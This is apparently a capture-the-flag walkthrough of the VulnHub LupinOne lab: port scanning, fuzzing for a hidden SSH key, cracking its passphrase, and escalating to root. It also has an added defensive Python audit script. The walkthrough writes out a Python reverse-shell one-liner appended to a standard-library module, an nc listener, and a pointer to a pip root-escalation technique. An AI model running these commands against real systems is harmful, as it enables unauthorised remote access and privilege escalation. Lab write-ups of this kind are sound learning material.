VulnHub: LupinOne
Today we will take a look at VulnHub: LupinOne. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 --open

Let’s look at the “~myfiles” path.

- FFUF
Command: ffuf -u 'http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Here we have a username. Now let’s find his private key file. As we know, private key file names are written after the “.” symbol, so we fuzz for names that start with a dot.
Command: ffuf -u 'http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20


We found the encoded text. Let’s use CyberChef to decode it. After researching, I found that it was base58.

Let’s check the connection to the target machine.

We use the fasttrack.txt file to crack the key’s passphrase, as stated in the message.


Command: echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' >> /usr/lib/python3.9/webbrowser.py
Command: nc -nvlp 4242
Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
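
The commands above append to a standard-library file and then run a script through sudo, which only has an effect when that script imports the file and the file is writable by an unprivileged account. As an added example (not part of the original writeup), this Python check lists the modules a script imports and flags any whose source file or directory is group- or world-writable; the function names and the sample modules are constructed for illustration.

```python
import ast
import os
import stat
import tempfile
from importlib.machinery import PathFinder

def imported_modules(script_path):
    """Top-level module names imported anywhere in the script (parsed, not executed)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def writable_by_others(path):
    """True if group/other write bits are set on the file or its parent directory."""
    risky = stat.S_IWGRP | stat.S_IWOTH
    return any(os.stat(p).st_mode & risky for p in (path, os.path.dirname(path)))

def audit(script_path, search_path=None):
    """Return [(module, file)] for imports whose source a non-owner can modify."""
    findings = []
    for name in imported_modules(script_path):
        # Locates the module without importing it; None means sys.path is used.
        spec = PathFinder.find_spec(name, search_path)
        origin = getattr(spec, "origin", None)
        if origin and os.path.isfile(origin) and writable_by_others(origin):
            findings.append((name, origin))
    return findings

def demo():
    """Constructed sample: a script importing one loose and one tight module."""
    d = tempfile.mkdtemp()  # created with mode 0700
    for name, mode in (("loose_mod", 0o666), ("tight_mod", 0o644)):
        p = os.path.join(d, name + ".py")
        with open(p, "w") as fh:
            fh.write("VALUE = 1\n")
        os.chmod(p, mode)
    script = os.path.join(d, "job.py")
    with open(script, "w") as fh:
        fh.write("import loose_mod\nfrom tight_mod import VALUE\nimport sys\n")
    return [name for name, _ in audit(script, [d])]

if __name__ == "__main__":
    print(demo())
```

On a real host, run `audit()` on each script that a sudoers rule allows, using the same interpreter the rule names so the modules resolve against the same `sys.path`.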


https://gtfobins.github.io/gtfobins/pip/

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”